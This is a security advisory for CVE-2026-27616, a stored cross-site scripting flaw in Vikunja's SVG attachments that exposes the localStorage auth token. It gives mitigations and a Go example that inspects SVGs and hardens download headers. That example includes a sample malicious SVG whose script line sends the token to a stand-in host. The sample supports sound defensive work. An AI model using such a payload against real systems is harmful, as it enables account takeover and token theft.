CVE-2026-27616: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in go-vikunja vikunja
CVE-2026-27616 is a high-severity cross-site scripting (XSS) vulnerability in versions of the open-source task management platform Vikunja prior to 2.0.0. The issue arises because the application allows users to upload SVG files as task attachments without sanitizing the SVG content. Since SVG files can contain executable JavaScript via <script> elements or event-handler attributes, malicious code embedded in an SVG file executes in the context of an authenticated user when the file is opened directly. This lets an attacker read the authentication token Vikunja keeps in localStorage, leading to account compromise. Exploitation requires user interaction (the victim must open the malicious SVG URL) and some level of privilege on the attacker's side to upload files. Vikunja 2.0.0 patches this vulnerability.
AI Analysis
Technical Summary
CVE-2026-27616 is a cross-site scripting (XSS) vulnerability classified under CWE-79 affecting the Vikunja task management platform in versions prior to 2.0.0. Vikunja allows users to upload SVG files as task attachments but does not sanitize or neutralize potentially malicious content within them. SVG is an XML-based vector image format that can carry embedded JavaScript through <script> elements, event-handler attributes such as onload, and javascript: URLs. A browser does not run that script when the SVG is loaded through an <img> element or as a CSS background image; it does run it when the SVG is opened as a document, which is what happens when a user navigates to the attachment URL directly (or when the file is embedded with <object>, <embed> or <iframe>). Because the attachment is served from the application's own origin, the script runs with the authenticated user's privileges. Vikunja stores authentication tokens in localStorage, which is readable by any script on the same origin, so the malicious script can read the token and exfiltrate it to an attacker-controlled server. This compromises the victim's account and lets the attacker perform actions as that user. Exploitation requires that the attacker can upload SVG attachments (which implies at least some authenticated privileges) and that a victim opens the malicious attachment URL, so user interaction is required. The vulnerability has a CVSS 3.1 base score of 7.3 (high), reflecting a network attack vector, low attack complexity, low privileges required, user interaction required, and high impact on confidentiality and integrity with no impact on availability. The issue is fixed in Vikunja 2.0.0; the advisory does not state whether the fix sanitizes SVG content at upload time or blocks unsafe SVG features outright. No exploitation in the wild had been reported as of the publication date.
Potential Impact
This vulnerability poses a significant risk to organizations running Vikunja versions prior to 2.0.0, especially multi-user deployments where task attachments are shared. Successful exploitation yields the victim's authentication token, letting the attacker act as that user and read or modify task data. Depending on how Vikunja is integrated with other systems, the stolen identity may also expose whatever those integrations grant. Because the attack needs the victim to open the attachment URL, phishing or social engineering is the likely delivery route, and a link to an attachment on the organization's own Vikunja domain looks legitimate. The impact is most serious where Vikunja holds sensitive project or planning information. Since the platform is self-hosted open source, organizations with limited security resources may be slower to patch, which lengthens the exposure window. The absence of known in-the-wild exploitation lowers the immediate risk but not the threat: once a malicious SVG is uploaded, exploitation is straightforward.
Mitigation Recommendations
1. Upgrade all Vikunja instances to version 2.0.0 or later; this is the only complete fix.
2. Until patched, disable or restrict SVG uploads as task attachments. Check file content, not just the extension: an SVG renamed to .png is still rendered as SVG if the server serves it with a type the browser treats as a document, so look for an <svg> root element.
3. Serve attachments so that they cannot render as a document on the application's origin: send Content-Disposition: attachment (which forces a download on direct navigation) and, where possible, host attachments on a separate origin (a dedicated domain or subdomain). Setting Content-Type to image/svg+xml does not help on its own; that is precisely the type the browser renders inline. With a separate origin, the same-origin policy keeps any script in the file away from the application's localStorage.
4. Apply a Content-Security-Policy to the attachment response itself, for example the sandbox directive or script-src 'none'. A CSP set only on the application's HTML pages does not govern a response the browser renders as a standalone SVG document.
5. Educate users not to open unexpected attachment links, especially ones received by e-mail or chat, even when they point at the organization's own Vikunja host.
6. Monitor upload and access logs: SVG uploads by users who do not normally post images, and attachment URLs fetched directly rather than through the application, are worth a look.
7. Review and limit which users may upload attachments.
8. Include file-upload handling in regular security audits and penetration tests.
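The block below is an added example written for this page, not code from the advisory or from the Vikunja project. It sketches in Go (Vikunja's backend language) the two controls the technical summary and the mitigation list describe: inspecting an uploaded file for the SVG features that execute when the file is rendered as a document, and serving attachments with headers that stop that rendering on the application's origin. The two sample SVGs are constructed for the example; InspectSVG, AttachmentHeaders and the ServeAttachment handler shape are hypothetical names and are not Vikunja's API.

```go
package main

import (
	"bytes"
	"encoding/xml"
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"strings"
)

// Constructed sample attachments; neither is taken from the advisory or from
// the Vikunja code base.
const benignSVG = `<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <circle cx="5" cy="5" r="4" fill="red"/>
</svg>`

// Has the shape the advisory describes: script and event-handler content that
// a browser runs if it navigates to the file on the application's origin.
const activeSVG = `<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">
  <a href="javascript:alert(2)"><text x="1" y="9">x</text></a>
  <script>fetch("https://example.invalid/?t=" + localStorage.getItem("token"))</script>
</svg>`

// InspectSVG reports whether data is an SVG document and which features in it
// can execute script when the file is rendered directly: <script> elements,
// on* event-handler attributes, javascript: URLs in href/xlink:href, and
// <foreignObject> (which can wrap arbitrary HTML). It walks the XML token
// stream instead of grepping, so names inside comments or CDATA are ignored.
func InspectSVG(data []byte) (isSVG bool, findings []string, err error) {
	dec := xml.NewDecoder(bytes.NewReader(data))
	dec.Strict = false // tolerate HTML-style entities that browsers accept
	for {
		tok, terr := dec.Token()
		if terr == io.EOF {
			return isSVG, findings, nil
		}
		if terr != nil {
			return isSVG, findings, terr
		}
		se, ok := tok.(xml.StartElement)
		if !ok {
			continue
		}
		name := strings.ToLower(se.Name.Local)
		if !isSVG {
			if name != "svg" {
				return false, nil, nil // root element is not <svg>: not an SVG file
			}
			isSVG = true
		}
		switch name {
		case "script":
			findings = append(findings, "<script> element")
		case "foreignobject":
			findings = append(findings, "<foreignObject> element")
		}
		for _, a := range se.Attr {
			attr := strings.ToLower(a.Name.Local) // xlink:href has Local "href"
			switch {
			case strings.HasPrefix(attr, "on"):
				findings = append(findings, fmt.Sprintf("<%s %s> event handler", name, attr))
			case attr == "href" && strings.HasPrefix(strings.ToLower(strings.TrimSpace(a.Value)), "javascript:"):
				findings = append(findings, fmt.Sprintf("<%s href> javascript: URL", name))
			}
		}
	}
}

// AttachmentHeaders returns response headers that stop an attachment from being
// rendered as a document on the application's origin. Content-Disposition
// forces a download instead of inline rendering; the sandbox CSP on this
// response denies script if the file is rendered anyway (e.g. via <object>);
// nosniff keeps the browser from re-guessing the declared type.
func AttachmentHeaders(filename string) http.Header {
	h := http.Header{}
	h.Set("Content-Type", "application/octet-stream")
	h.Set("Content-Disposition", fmt.Sprintf("attachment; filename=%q", filename))
	h.Set("Content-Security-Policy", "sandbox; script-src 'none'")
	h.Set("X-Content-Type-Options", "nosniff")
	return h
}

// ServeAttachment is a hypothetical download handler shape (not Vikunja's own
// route) that applies the headers above before writing the file body.
func ServeAttachment(w http.ResponseWriter, filename string, data []byte) {
	for k, v := range AttachmentHeaders(filename) {
		w.Header()[k] = v
	}
	w.Write(data)
}

func main() {
	for _, s := range []struct{ label, body string }{{"benign", benignSVG}, {"active", activeSVG}} {
		isSVG, findings, err := InspectSVG([]byte(s.body))
		fmt.Printf("%s: svg=%v err=%v findings=%v\n", s.label, isSVG, err, findings)
	}
	rec := httptest.NewRecorder()
	ServeAttachment(rec, "task.svg", []byte(activeSVG))
	fmt.Println(rec.Header().Get("Content-Disposition"), "|", rec.Header().Get("Content-Security-Policy"))
}
```

On the upload path, rejecting or quarantining any file for which InspectSVG returns findings is the pre-patch equivalent of mitigation 2; on the download path, AttachmentHeaders covers mitigations 3 and 4 for a single-origin deployment. Hosting attachments on a separate origin remains the stronger control, because it no longer depends on every download route setting the right headers.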
Affected Countries
United States, Germany, France, United Kingdom, Canada, Australia, Netherlands, Sweden, Switzerland, Japan, India
Technical Details
- Data Version: 5.2
- Assigner Short Name: GitHub_M
- Date Reserved: 2026-02-20T19:43:14.603Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 699f7012b7ef31ef0b5b7bc0
Added to database: 2/25/2026, 9:56:34 PM
Last enriched: 2/25/2026, 10:11:38 PM
Last updated: 2/26/2026, 1:08:10 AM
Related Threats
- CVE-2026-27896: CWE-178: Improper Handling of Case Sensitivity in modelcontextprotocol go-sdk (High)
- CVE-2026-27888: CWE-400: Uncontrolled Resource Consumption in py-pdf pypdf (Medium)
- CVE-2026-27884: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in Pennyw0rth NetExec (Medium)
- CVE-2026-27837: CWE-1321: Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') in mickhansen dottie.js (Medium)
- CVE-2026-27831: CWE-125: Out-of-bounds Read in bluedragonsecurity rldns (High)